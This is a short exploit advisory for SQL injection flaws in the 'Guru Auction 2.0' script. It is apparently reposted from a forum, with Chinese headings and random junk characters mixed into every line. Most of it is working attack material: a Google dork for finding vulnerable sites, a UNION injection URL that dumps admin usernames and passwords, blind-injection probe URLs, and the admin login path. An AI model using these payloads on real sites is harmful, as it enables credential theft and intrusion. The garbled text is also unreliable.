Guru Auction 2.0 Multiple SQL Injection Vulnerabilities$ G6 X" D7 g) q1 s
# z1 P n g0 Q+ b$ J2 D
作者 : v3n0m
2 }( v5 @$ y/ o( _* T/ {应用 : Guru Auction 2.0+ T" ~! ~! k$ }
Price : $49, p/ L& v2 D! S9 ]* w" H0 J& e1 E
Vendor : http://www.guruscript.com/
* V% N) z9 N2 Q7 jGoogle Dork : inurl:subcat.php?cate_id=; l6 i5 E0 u" x4 f: N9 }
9 [1 v1 t9 B3 d; T" l; wSQLi p0c:
' }5 [& l( i% b; C% R% G~~~~~~~~~~
- I/ C# b6 _0 k z) Y9 w! }http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--% Z* }! @4 G9 Q/ J A$ d- }/ T# T
6 w0 b9 u% {4 S3 F0 f% g) u
/ y& b2 s6 j0 k3 _6 ?! l- U) W W盲注 p0c:
6 f N4 x- ]# f+ a; y: N7 D~~~~~~~~~~ {3 c% `- O9 v' t" U8 K
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true- Y* t+ ^1 D) A" i' c0 e i
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
( K! d ~% F: ^2 V 0 d* b3 H! x. m" H9 z: {- x j
管理登录入口:/ L3 n# N* f6 N9 s: t! S, A
~~~~~~~~~~: l# r, B% p/ J$ W% d' o
http://domain.tld/[path]/admin/7 \0 T$ j4 p* y& F( {0 B# O9 R
|